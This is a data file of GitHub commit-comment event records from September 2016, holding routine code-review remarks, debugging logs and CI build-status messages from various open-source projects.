{"id":"4595468342","type":"CommitCommentEvent","actor":{"login":"agherzan"},"repo":{"name":"agherzan/meta-raspberrypi"},"payload":{"comment":{"id":19111606,"position":null,"line":null,"path":null,"commit_id":"dedd75f08ffe3360722ab761da18987aa681edd1","created_at":"2016-09-21T10:48:50Z","updated_at":"2016-09-21T10:48:50Z","body":"@ali1234 Can you please create an issue here in github? Or even submit a patch that would remove that section. I intend to replace it with github issues."}},"created_at":"2016-09-21T10:48:50Z"}
{"id":"4595468740","type":"CommitCommentEvent","actor":{"login":"alxndrsn"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19111607,"position":6,"line":31,"path":"static/js/controllers/contacts-content.js","commit_id":"f811aef39023270b854af8119a5f3b7eb26fe8f0","created_at":"2016-09-21T10:48:55Z","updated_at":"2016-09-21T10:48:55Z","body":"This is basically no-op code, and tends to get forgotten when all other references to the variables have already been removed.  For me these declarations do not aid readability."}},"created_at":"2016-09-21T10:48:55Z"}
{"id":"4595470463","type":"CommitCommentEvent","actor":{"login":"Yivan"},"repo":{"name":"pimcore/pimcore"},"payload":{"comment":{"id":19111612,"position":null,"line":null,"path":null,"commit_id":"87959964e596f9916a73b2daab613427ca979021","created_at":"2016-09-21T10:49:17Z","updated_at":"2016-09-21T10:49:17Z","body":"Just to prevent futur problem, it is missing the end $ operator on line 51 for the preg_match for JS.\r\nThanks."}},"created_at":"2016-09-21T10:49:17Z"}
{"id":"4595472100","type":"CommitCommentEvent","actor":{"login":"thomasmars"},"repo":{"name":"h5p/h5p-editor-select-toggle-fields"},"payload":{"comment":{"id":19111614,"position":7,"line":7,"path":"select-toggle-fields.js","commit_id":"e7321ccc5df36e1f2ad210f7d711677f5edd03e9","created_at":"2016-09-21T10:49:40Z","updated_at":"2016-09-21T10:49:40Z","body":"Implicitly declared variable"}},"created_at":"2016-09-21T10:49:40Z"}
{"id":"4595472848","type":"CommitCommentEvent","actor":{"login":"julbra"},"repo":{"name":"chimurai/http-proxy-middleware"},"payload":{"comment":{"id":19111616,"position":null,"line":null,"path":null,"commit_id":"53fe79b6c36ca4034c3fd68ffb29bcc81d84e576","created_at":"2016-09-21T10:49:51Z","updated_at":"2016-09-21T10:49:51Z","body":"Yes, the server is browser-sync, I'm also hitting https://github.com/chimurai/http-proxy-middleware/issues/15. I discovered the leak trying to debug what's going wrong there.\r\n\r\nHere is my proxy config:\r\n```\r\nvar proxyMiddleware = proxy('/pp', {\r\n      ws: true,\r\n      prependPath: false,\r\n      target: formattedUrl,\r\n      changeOrigin: true,\r\n      logLevel: 'debug'\r\n    });\r\n```\r\nAnd here is the server config:\r\n```\r\nbrowserSync.init({\r\n    server: {\r\n      baseDir: \"../dist\",\r\n      middleware: [proxyMiddleware]\r\n    },\r\n    ghostMode: false,\r\n    open: false,\r\n    port: 3100\r\n  }, function () {\r\n    callback();\r\n  });\r\n```"}},"created_at":"2016-09-21T10:49:51Z"}
{"id":"4595472894","type":"CommitCommentEvent","actor":{"login":"RunningForever"},"repo":{"name":"RunningForever/FaceMessage"},"payload":{"comment":{"id":19111617,"position":null,"line":null,"path":null,"commit_id":"fc3631ad23d703882e46540ece4fc23026fb27f2","created_at":"2016-09-21T10:49:51Z","updated_at":"2016-09-21T10:49:51Z","body":"这是一款基于Face++的，用人脸识别来留言的软件"}},"created_at":"2016-09-21T10:49:51Z"}
{"id":"4595475203","type":"CommitCommentEvent","actor":{"login":"maxbarnas"},"repo":{"name":"ckeditor/ckeditor5-typing"},"payload":{"comment":{"id":19111623,"position":25,"line":81,"path":"src/changebuffer.js","commit_id":"25e0429adffb8e0c07e7099c9336dd3afb914713","created_at":"2016-09-21T10:50:20Z","updated_at":"2016-09-21T10:50:20Z","body":"Quick check of `change:range` listener does not help at all."}},"created_at":"2016-09-21T10:50:20Z"}
{"id":"4595476564","type":"CommitCommentEvent","actor":{"login":"maxbarnas"},"repo":{"name":"ckeditor/ckeditor5-typing"},"payload":{"comment":{"id":19111626,"position":17,"line":73,"path":"src/changebuffer.js","commit_id":"25e0429adffb8e0c07e7099c9336dd3afb914713","created_at":"2016-09-21T10:50:38Z","updated_at":"2016-09-21T10:50:38Z","body":"Moving `isLocked` to `_reset()` breaks the fix."}},"created_at":"2016-09-21T10:50:38Z"}
{"id":"4595476673","type":"CommitCommentEvent","actor":{"login":"bl99"},"repo":{"name":"StataBS/indikatoren"},"payload":{"comment":{"id":19111627,"position":null,"line":null,"path":null,"commit_id":"f31a768c3c423506d1de840704f1897a4f41ee19","created_at":"2016-09-21T10:50:39Z","updated_at":"2016-09-21T10:50:39Z","body":"Alternativ könnte man auch Quadrate statt Kreise nehmen:\r\n![2016-09-21 12_47_14-mozilla firefox](https://cloud.githubusercontent.com/assets/20966212/18708160/bc5d14c0-7ff9-11e6-8262-7b0a0ee677bc.jpg)\r\n\r\n\"pointFormat\": '<span style=\"color:{point.color}\">\\**u25FC**</span> {series.name}: <b>{point.y}</b> ({point.percentage:.0f}%)<br/>',\r\n\r\nIch fänds bei Balkengrafiken fast schöner... @JE1982 & @jb3-2 : eure Entscheidung\r\n\r\n"}},"created_at":"2016-09-21T10:50:39Z"}
{"id":"4595478663","type":"CommitCommentEvent","actor":{"login":"taimir"},"repo":{"name":"taimir/kubernetes"},"payload":{"comment":{"id":19111635,"position":null,"line":null,"path":null,"commit_id":"c3860a5241f73adecde384eff5c1c83a363854b1","created_at":"2016-09-21T10:51:07Z","updated_at":"2016-09-21T10:51:07Z","body":"OK, following the manual from above, It all worked out fine until the installation of the `weave` overlay. Here's the output of `kubectl logs <weave-pod>`:\r\n\r\n```\r\n2016-09-21 10:35:08.615993 I | error contacting APIServer: Get http://localhost:8080/api: dial tcp: lookup localhost: no such host\r\nINFO: 2016/09/21 10:35:10.336934 Command line options: map[ipalloc-range:10.244.0.0/14 name:12:e1:cf:30:6d:67 nickname:kube-master no-dns:true port:6783 docker-api: datapath:datapath http-addr:127.0.0.1:6784]\r\nWARN: 2016/09/21 10:35:10.428286 Address already in use creating vxlan vport 6784 - retrying\r\nWARN: 2016/09/21 10:35:10.464325 Address already in use creating vxlan vport 6784 - retrying\r\nWARN: 2016/09/21 10:35:10.490495 Address already in use creating vxlan vport 6784 - retrying\r\nWARN: 2016/09/21 10:35:10.516493 Address already in use creating vxlan vport 6784 - retrying\r\nWARN: 2016/09/21 10:35:10.544255 Address already in use creating vxlan vport 6784 - retrying\r\nFATA: 2016/09/21 10:35:10.554489 netlink error response: address already in use\r\nWeave process has died\r\n```\r\n\r\nThe setup of the nodes (Ubuntu Xenial, 2 VMs, virtualbox):\r\n* there's no DNS server, both nodes have short-form hostnames (`kube-master` and `kube-node1`) and corresponding entries in '/etc/hosts' so that both nodes can resolve their partner's hostname.\r\n* The nodes are connected over a private network via their `eth1' interface.\r\n* The nodes are connected to a public network (with internet access) over the `eth2` interface.\r\n* The default gateway of both nodes i the `eth2` interface.\r\n* The `eth0` interface is NATed by virtualbox (host to VM).\r\n* There is connectivity between both nodes via the `eth1` private subnet, over the `eth2` subnet and also using the short hostnames (because of the entries in `/etc/hosts`).\r\n\r\n`kube-proxy` starts properly and adds the expected rules for the `kubernetes` service to `iptables -t nat`. The address used as a `dst` for the `kubernetes` service iptables rule is the one on the `eth2` interface of the master node. Obviously, the API server uses this same address to advertise itself.\r\n\r\nAm I missing some dependency? I can confirm that a `flannel` overlay worked in this very same setup, so its something `weave` specific.\r\n\r\nPing me if you need more logs / debug info.\r\n"}},"created_at":"2016-09-21T10:51:07Z"}
{"id":"4595481887","type":"CommitCommentEvent","actor":{"login":"taimir"},"repo":{"name":"taimir/kubernetes"},"payload":{"comment":{"id":19111647,"position":null,"line":null,"path":null,"commit_id":"c3860a5241f73adecde384eff5c1c83a363854b1","created_at":"2016-09-21T10:51:50Z","updated_at":"2016-09-21T10:51:50Z","body":"BTW the rest of the cluster bootstrap worked like a charm, all certificates are in place and the `kube-discovery` did its job as expected."}},"created_at":"2016-09-21T10:51:50Z"}
{"id":"4595485790","type":"CommitCommentEvent","actor":{"login":"andrebola"},"repo":{"name":"MTG/freesound"},"payload":{"comment":{"id":19111653,"position":null,"line":null,"path":null,"commit_id":"0fa36f20c80b2128b88715020136babd15e4055d","created_at":"2016-09-21T10:52:43Z","updated_at":"2016-09-21T10:52:43Z","body":"This time is only for django, because I measured the time spent until returning the text file that handles nginx."}},"created_at":"2016-09-21T10:52:43Z"}
{"id":"4595488990","type":"CommitCommentEvent","actor":{"login":"mido3ds"},"repo":{"name":"mido3ds/Makefile"},"payload":{"comment":{"id":19111663,"position":null,"line":null,"path":null,"commit_id":"b699bc615caa952873fcd4435a0ef3f59d1f0b43","created_at":"2016-09-21T10:53:25Z","updated_at":"2016-09-21T10:53:25Z","body":"it uses c11 not c++11, needs changing to fit c++ compiling"}},"created_at":"2016-09-21T10:53:25Z"}
{"id":"4595495582","type":"CommitCommentEvent","actor":{"login":"stephenc"},"repo":{"name":"jenkinsci/impersonation-plugin"},"payload":{"comment":{"id":19111676,"position":177,"line":177,"path":"src/main/java/org/jenkinsci/plugins/impersonation/ImpersonationAction.java","commit_id":"d57fdab5296497c3658a289e96547fd917a109f3","created_at":"2016-09-21T10:54:56Z","updated_at":"2016-09-21T10:54:56Z","body":"With the authorize-project plugin changes coming, you can configure a job to run as an external group rather than a specific individual...\r\n\r\nThat way you do not need to worry about the individual leaving the team (as if they do you presumably remove them from the external group)... but, as a side-effect, only that group's identity will be able to configure the job... also if you want to manage that group identity's credentials you would need to be logged in as the group...\r\n\r\nThis plugin provides that mechanism...\r\n\r\nFuture enhancements may include allowing the admin to define \"jenkins internal groups\" but I suspect that will require some supporting core changes"}},"created_at":"2016-09-21T10:54:56Z"}
{"id":"4595496114","type":"CommitCommentEvent","actor":{"login":"MaxKellermann"},"repo":{"name":"gmdimitriz/XCSoar"},"payload":{"comment":{"id":19111679,"position":51,"line":51,"path":"src/Device/Driver/ThermalExpress/Driver.cpp","commit_id":"e0bb16c7da83ad714ebf1aca9301235171047e93","created_at":"2016-09-21T10:55:04Z","updated_at":"2016-09-21T10:55:04Z","body":"Why does this abort the parser completely just because there is no altitude?"}},"created_at":"2016-09-21T10:55:04Z"}
{"id":"4595498608","type":"CommitCommentEvent","actor":{"login":"MaxKellermann"},"repo":{"name":"gmdimitriz/XCSoar"},"payload":{"comment":{"id":19111683,"position":93,"line":93,"path":"src/Device/Driver/ThermalExpress/Driver.cpp","commit_id":"e0bb16c7da83ad714ebf1aca9301235171047e93","created_at":"2016-09-21T10:55:35Z","updated_at":"2016-09-21T10:55:35Z","body":"Missing return value check."}},"created_at":"2016-09-21T10:55:35Z"}
{"id":"4595500057","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19111688,"position":null,"line":null,"path":null,"commit_id":"ec522547e5f91792a13fe9aaf678f3e1b5ca42bc","created_at":"2016-09-21T10:55:55Z","updated_at":"2016-09-21T10:55:55Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: Build Failed\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ec522547e5f91792a13fe9aaf678f3e1b5ca42bc-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ec522547e5f91792a13fe9aaf678f3e1b5ca42bc-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-52.39%25-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ec522547e5f91792a13fe9aaf678f3e1b5ca42bc-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-0.0%25-red.svg)</a>\n"}},"created_at":"2016-09-21T10:55:55Z"}
{"id":"4595500148","type":"CommitCommentEvent","actor":{"login":"ChristianBeer"},"repo":{"name":"BOINC/boinc"},"payload":{"comment":{"id":19111689,"position":15,"line":800,"path":"lib/str_util.cpp","commit_id":"01ea1ef8fb659c4488425f9bea380009ebe6843f","created_at":"2016-09-21T10:55:57Z","updated_at":"2016-09-21T10:55:57Z","body":"Portability, I wanted to have a function that works directly on strings. Using `basename()` would only eliminate the `fpath.rfind()` and `fpath.substr()` calls."}},"created_at":"2016-09-21T10:55:57Z"}
{"id":"4595500798","type":"CommitCommentEvent","actor":{"login":"MaxKellermann"},"repo":{"name":"gmdimitriz/XCSoar"},"payload":{"comment":{"id":19111690,"position":121,"line":121,"path":"src/Device/Driver/ThermalExpress/Driver.cpp","commit_id":"e0bb16c7da83ad714ebf1aca9301235171047e93","created_at":"2016-09-21T10:56:06Z","updated_at":"2016-09-21T10:56:06Z","body":"Buffer overflow."}},"created_at":"2016-09-21T10:56:06Z"}
{"id":"4595501592","type":"CommitCommentEvent","actor":{"login":"MaxKellermann"},"repo":{"name":"gmdimitriz/XCSoar"},"payload":{"comment":{"id":19111693,"position":123,"line":123,"path":"src/Device/Driver/ThermalExpress/Driver.cpp","commit_id":"e0bb16c7da83ad714ebf1aca9301235171047e93","created_at":"2016-09-21T10:56:17Z","updated_at":"2016-09-21T10:56:17Z","body":"Another buffer overflow."}},"created_at":"2016-09-21T10:56:17Z"}
{"id":"4595502385","type":"CommitCommentEvent","actor":{"login":"MaxKellermann"},"repo":{"name":"gmdimitriz/XCSoar"},"payload":{"comment":{"id":19111696,"position":132,"line":132,"path":"src/Device/Driver/ThermalExpress/Driver.cpp","commit_id":"e0bb16c7da83ad714ebf1aca9301235171047e93","created_at":"2016-09-21T10:56:28Z","updated_at":"2016-09-21T10:56:28Z","body":"Not thread-safe."}},"created_at":"2016-09-21T10:56:28Z"}
{"id":"4595502953","type":"CommitCommentEvent","actor":{"login":"athanatos"},"repo":{"name":"aravind-ramesh/ceph"},"payload":{"comment":{"id":19111699,"position":275,"line":2257,"path":"src/osd/ECBackend.cc","commit_id":"7bbd4f05138d0c983bf1fcc27b12552c2814bb10","created_at":"2016-09-21T10:56:35Z","updated_at":"2016-09-21T10:56:35Z","body":"You haven't checked whether r is negative here..."}},"created_at":"2016-09-21T10:56:35Z"}
{"id":"4595504259","type":"CommitCommentEvent","actor":{"login":"MaxKellermann"},"repo":{"name":"gmdimitriz/XCSoar"},"payload":{"comment":{"id":19111702,"position":53,"line":53,"path":"src/Device/Driver/ThermalExpress/Driver.hpp","commit_id":"e0bb16c7da83ad714ebf1aca9301235171047e93","created_at":"2016-09-21T10:56:53Z","updated_at":"2016-09-21T10:56:53Z","body":"A getter should return its value, not copy the result into  some reference parameter. Bad API design."}},"created_at":"2016-09-21T10:56:53Z"}
{"id":"4595504374","type":"CommitCommentEvent","actor":{"login":"maxbarnas"},"repo":{"name":"ckeditor/ckeditor5-typing"},"payload":{"comment":{"id":19111704,"position":18,"line":82,"path":"src/input.js","commit_id":"25e0429adffb8e0c07e7099c9336dd3afb914713","created_at":"2016-09-21T10:56:54Z","updated_at":"2016-09-21T10:56:54Z","body":"This is indeed not necessary. It should go to https://github.com/ckeditor/ckeditor5-typing/commit/25e0429adffb8e0c07e7099c9336dd3afb914713#diff-8052e4286a369903aa5d7f6c2d8b7190L91."}},"created_at":"2016-09-21T10:56:54Z"}
{"id":"4595505312","type":"CommitCommentEvent","actor":{"login":"MaxKellermann"},"repo":{"name":"gmdimitriz/XCSoar"},"payload":{"comment":{"id":19111705,"position":42,"line":42,"path":"src/Device/Driver/ThermalExpress/Driver.hpp","commit_id":"e0bb16c7da83ad714ebf1aca9301235171047e93","created_at":"2016-09-21T10:57:07Z","updated_at":"2016-09-21T10:57:07Z","body":"Documentation missing. What do these variables mean?"}},"created_at":"2016-09-21T10:57:07Z"}
{"id":"4595505439","type":"CommitCommentEvent","actor":{"login":"Razzile"},"repo":{"name":"benvanik/xenia"},"payload":{"comment":{"id":19111706,"position":null,"line":null,"path":null,"commit_id":"a3c2b8b3f5b12762214556b44abc0c152cafc27b","created_at":"2016-09-21T10:57:08Z","updated_at":"2016-09-21T10:57:08Z","body":"@Parovozik this is not the place for this. please make an issue if you have a feature request"}},"created_at":"2016-09-21T10:57:08Z"}
{"id":"4595506496","type":"CommitCommentEvent","actor":{"login":"rod-lin"},"repo":{"name":"rod-lin/ivm"},"payload":{"comment":{"id":19111709,"position":null,"line":null,"path":null,"commit_id":"9fe8bbc29a6737970d21f4851f2ea847ca743e7e","created_at":"2016-09-21T10:57:21Z","updated_at":"2016-09-21T10:57:21Z","body":"我们晚自修其实还是挺闲的orz。。诶加油。"}},"created_at":"2016-09-21T10:57:21Z"}
{"id":"4595507317","type":"CommitCommentEvent","actor":{"login":"MaxKellermann"},"repo":{"name":"gmdimitriz/XCSoar"},"payload":{"comment":{"id":19111711,"position":37,"line":37,"path":"src/Device/Driver/ThermalExpress/Driver.hpp","commit_id":"e0bb16c7da83ad714ebf1aca9301235171047e93","created_at":"2016-09-21T10:57:33Z","updated_at":"2016-09-21T10:57:33Z","body":"Why stdlib.h? Andd why all these other includes?"}},"created_at":"2016-09-21T10:57:33Z"}
{"id":"4595509119","type":"CommitCommentEvent","actor":{"login":"MaxKellermann"},"repo":{"name":"gmdimitriz/XCSoar"},"payload":{"comment":{"id":19111714,"position":57,"line":57,"path":"src/Device/Driver/ThermalExpress/Driver.hpp","commit_id":"e0bb16c7da83ad714ebf1aca9301235171047e93","created_at":"2016-09-21T10:57:56Z","updated_at":"2016-09-21T10:57:56Z","body":"Attributes belong to the top, according to the XCSoar developer manual."}},"created_at":"2016-09-21T10:57:56Z"}
{"id":"4595516623","type":"CommitCommentEvent","actor":{"login":"MaxKellermann"},"repo":{"name":"gmdimitriz/XCSoar"},"payload":{"comment":{"id":19111724,"position":58,"line":58,"path":"src/Dialogs/Device/ThermalExpress/ThermalExpressConfigDialog.cpp","commit_id":"e0bb16c7da83ad714ebf1aca9301235171047e93","created_at":"2016-09-21T10:59:40Z","updated_at":"2016-09-21T10:59:40Z","body":"All other dialogs use a standard \"OK\" button, and so should you. That one is handled by WidgetDialog, and calls `Widget::Save()`."}},"created_at":"2016-09-21T10:59:40Z"}
{"id":"4595519831","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":19111727,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-21T11:00:19Z","updated_at":"2016-09-21T11:00:19Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.175](http://build.clear-measure.com/viewLog.html?buildId=10575&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) is now running\n"}},"created_at":"2016-09-21T11:00:19Z"}
{"id":"4595520367","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19111728,"position":null,"line":null,"path":null,"commit_id":"ec522547e5f91792a13fe9aaf678f3e1b5ca42bc","created_at":"2016-09-21T11:00:26Z","updated_at":"2016-09-21T11:00:26Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: Build Failed\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ec522547e5f91792a13fe9aaf678f3e1b5ca42bc-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ec522547e5f91792a13fe9aaf678f3e1b5ca42bc-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-35.35%25-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ec522547e5f91792a13fe9aaf678f3e1b5ca42bc-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-0.0%25-red.svg)</a>\n"}},"created_at":"2016-09-21T11:00:26Z"}
{"id":"4595521673","type":"CommitCommentEvent","actor":{"login":"MaxKellermann"},"repo":{"name":"gmdimitriz/XCSoar"},"payload":{"comment":{"id":19111731,"position":64,"line":64,"path":"src/Dialogs/Device/ThermalExpress/ThermalExpressConfigDialog.cpp","commit_id":"e0bb16c7da83ad714ebf1aca9301235171047e93","created_at":"2016-09-21T11:00:43Z","updated_at":"2016-09-21T11:00:43Z","body":"Unnecessary call - pass the existing value to `AddInteger()` instead. You don't need the whole `Show()` method!"}},"created_at":"2016-09-21T11:00:43Z"}
{"id":"4595522649","type":"CommitCommentEvent","actor":{"login":"JMRousselle"},"repo":{"name":"JMRousselle/le2m-v2.1"},"payload":{"comment":{"id":19111734,"position":null,"line":null,"path":null,"commit_id":"bb6ae3dafce9f79a77c762e2505d18c9af8f1c82","created_at":"2016-09-21T11:00:56Z","updated_at":"2016-09-21T11:00:56Z","body":"Holt et Laury"}},"created_at":"2016-09-21T11:00:56Z"}
{"id":"4595522816","type":"CommitCommentEvent","actor":{"login":"B--B"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":19111736,"position":null,"line":null,"path":null,"commit_id":"0cfb340e06f709eea2483a561c8a12add223a160","created_at":"2016-09-21T11:00:59Z","updated_at":"2016-09-21T11:00:59Z","body":"And what will happen when loki tries to patch an unlocked bootloader? "}},"created_at":"2016-09-21T11:00:59Z"}
{"id":"4595523153","type":"CommitCommentEvent","actor":{"login":"alastair"},"repo":{"name":"MTG/freesound"},"payload":{"comment":{"id":19111737,"position":null,"line":null,"path":null,"commit_id":"0fa36f20c80b2128b88715020136babd15e4055d","created_at":"2016-09-21T11:01:03Z","updated_at":"2016-09-21T11:01:03Z","body":"I'm surprised it takes so long to run this function. Can you profile the view? Perhaps it's doing 1 sql query for each sound or something, which would be an easy optimisation to fix"}},"created_at":"2016-09-21T11:01:03Z"}
{"id":"4595524166","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19111738,"position":null,"line":null,"path":null,"commit_id":"ec522547e5f91792a13fe9aaf678f3e1b5ca42bc","created_at":"2016-09-21T11:01:16Z","updated_at":"2016-09-21T11:01:16Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ec522547e5f91792a13fe9aaf678f3e1b5ca42bc-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-21T11:01:16Z"}
{"id":"4595525834","type":"CommitCommentEvent","actor":{"login":"MaxKellermann"},"repo":{"name":"gmdimitriz/XCSoar"},"payload":{"comment":{"id":19111745,"position":139,"line":139,"path":"src/Device/Driver/ThermalExpress/Driver.cpp","commit_id":"e0bb16c7da83ad714ebf1aca9301235171047e93","created_at":"2016-09-21T11:01:38Z","updated_at":"2016-09-21T11:01:38Z","body":"Not thread-safe."}},"created_at":"2016-09-21T11:01:38Z"}
{"id":"4595526220","type":"CommitCommentEvent","actor":{"login":"cybrann"},"repo":{"name":"Krudor/TrinityCore"},"payload":{"comment":{"id":19111747,"position":null,"line":null,"path":null,"commit_id":"1d11b12cef97409b466da7282eb2eea68426d384","created_at":"2016-09-21T11:01:43Z","updated_at":"2016-09-21T11:01:43Z","body":"@Krudor Could you share that challenge mode system with me? :)"}},"created_at":"2016-09-21T11:01:43Z"}
{"id":"4595528686","type":"CommitCommentEvent","actor":{"login":"regalstreak"},"repo":{"name":"OnePlusOSS/android_kernel_oneplus_msm8994"},"payload":{"comment":{"id":19111756,"position":null,"line":null,"path":null,"commit_id":"ada398b71d7e24f3db71bfbe132f1c30383ba1e9","created_at":"2016-09-21T11:02:17Z","updated_at":"2016-09-21T11:02:17Z","body":"Well it's oneplus and they love to squash and no good commit messages. Should pretty much do the same as you're telling."}},"created_at":"2016-09-21T11:02:17Z"}
{"id":"4595530018","type":"CommitCommentEvent","actor":{"login":"samdark"},"repo":{"name":"yiisoft/yii2"},"payload":{"comment":{"id":19111762,"position":5,"line":285,"path":"framework/assets/yii.activeForm.js","commit_id":"0c288ea49eed8c98e04af33dd81b32d1809caac5","created_at":"2016-09-21T11:02:33Z","updated_at":"2016-09-21T11:02:33Z","body":"It does not. Parameters are optional by default and signature doesn't matter for method overrides."}},"created_at":"2016-09-21T11:02:33Z"}
{"id":"4595530146","type":"CommitCommentEvent","actor":{"login":"MaxKellermann"},"repo":{"name":"gmdimitriz/XCSoar"},"payload":{"comment":{"id":19111764,"position":40,"line":40,"path":"src/Device/Driver/ThermalExpress/Driver.cpp","commit_id":"e0bb16c7da83ad714ebf1aca9301235171047e93","created_at":"2016-09-21T11:02:36Z","updated_at":"2016-09-21T11:02:36Z","body":"Add unit test for all NMEA parsers."}},"created_at":"2016-09-21T11:02:36Z"}
{"id":"4595530475","type":"CommitCommentEvent","actor":{"login":"Twitchboy"},"repo":{"name":"Twitchboy/test2"},"payload":{"comment":{"id":19111765,"position":null,"line":null,"path":null,"commit_id":"f07d7e83498a3f3a9c3507c736662eac588f3712","created_at":"2016-09-21T11:02:38Z","updated_at":"2016-09-21T11:02:38Z","body":"dev2 add Readme"}},"created_at":"2016-09-21T11:02:38Z"}
{"id":"4595531608","type":"CommitCommentEvent","actor":{"login":"ptomin"},"repo":{"name":"uxmal/reko"},"payload":{"comment":{"id":19111769,"position":44,"line":44,"path":"subjects/PE-x86/VCExeSample/VCExeSample.c","commit_id":"e792a89b67ccb3cf04c10e47d3804cf32688fd00","created_at":"2016-09-21T11:02:53Z","updated_at":"2016-09-21T11:02:53Z","body":"This is regression!"}},"created_at":"2016-09-21T11:02:53Z"}
{"id":"4595531986","type":"CommitCommentEvent","actor":{"login":"dkati"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":19111770,"position":null,"line":null,"path":null,"commit_id":"0cfb340e06f709eea2483a561c8a12add223a160","created_at":"2016-09-21T11:02:59Z","updated_at":"2016-09-21T11:02:59Z","body":"theoritically wont we have to see those echos:\r\necho '[*] Unlocked bootloader version detected.'\r\necho '[*] Flashing unmodified boot.img to device.'\r\ndd if=/tmp/boot.img of=/dev/block/platform/msm_sdcc.1/by-name/boot || exit 1\r\n\r\nfrom device/samsung/jflte/releasetools/loki.sh??"}},"created_at":"2016-09-21T11:02:59Z"}
{"id":"4595532132","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":19111771,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-21T11:03:01Z","updated_at":"2016-09-21T11:03:01Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.175](http://build.clear-measure.com/viewLog.html?buildId=10575&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 72, ignored: 2 Build time: 00:02:41"}},"created_at":"2016-09-21T11:03:01Z"}
{"id":"4595533915","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19111776,"position":null,"line":null,"path":null,"commit_id":"69affeb17a69b05df08437f1c3ced982c7eac0f7","created_at":"2016-09-21T11:03:24Z","updated_at":"2016-09-21T11:03:24Z","body":"EMS (brianlball) - Win64-Windows-7-VisualStudio-12: OK (2322 of 2479 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-69affeb17a69b05df08437f1c3ced982c7eac0f7-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-69affeb17a69b05df08437f1c3ced982c7eac0f7-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.67%25-yellow.svg)</a> \n"}},"created_at":"2016-09-21T11:03:24Z"}
{"id":"4595539090","type":"CommitCommentEvent","actor":{"login":"awhiemstra"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19111794,"position":10,"line":73,"path":"plugins/LegacyProfileReader/LegacyProfileReader.py","commit_id":"48fc9576953c59647b488734dfdc7a5b7c8f012b","created_at":"2016-09-21T11:04:37Z","updated_at":"2016-09-21T11:04:37Z","body":"It depends on the calling code. If that does not catch exceptions, it will bubble up and be put into the log. If it does, it depends on what the calling code does.\r\n\r\nNote that I think you should raise a more specific exception than just \"Exception\" when doing this, to prevent calling code from needing to do \"try: except Exception\"."}},"created_at":"2016-09-21T11:04:37Z"}
